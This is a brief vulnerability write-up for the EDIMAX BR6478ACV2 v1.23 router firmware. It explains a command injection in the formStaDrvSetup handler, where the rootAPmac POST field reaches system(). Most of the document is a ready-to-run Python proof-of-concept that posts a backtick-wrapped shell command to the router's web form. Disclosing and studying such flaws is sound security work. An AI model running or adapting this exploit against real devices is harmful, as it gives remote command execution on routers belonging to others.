BR6478ACV2_v1.23
The EDIMAX BR6478ACV2_v1.23 firmware has a command injection vulnerability in the formStaDrvSetup function. The v81 variables receive the rootAPmac parameters from a POST request. However, since the user can control the input of these variables, the statement system() can cause a command injection.
import requests
ip = "192.168.2.1"
data = {
"stadrv_band": "0",
"stadrv_type": "1",
"stadrv_clonemac": "",
"stadrv_ssid": "",
"stadrv_encrypttype":"0",
"iqsetupclose": "",
"submit-url": "",
"isApply": "",
"WISP_enable5g": "",
"WISP_enable2g": "",
"wiz_wispManu": "x",
"WISPMANU": "",
"bindrootAPmac": "",
"rootAPmac": "'`ps>/1.txt`'",
}
url = f'http://{ip}/goform/formStaDrvSetup'
res = requests.post(url=url, data=data, verify=False)
print(res)
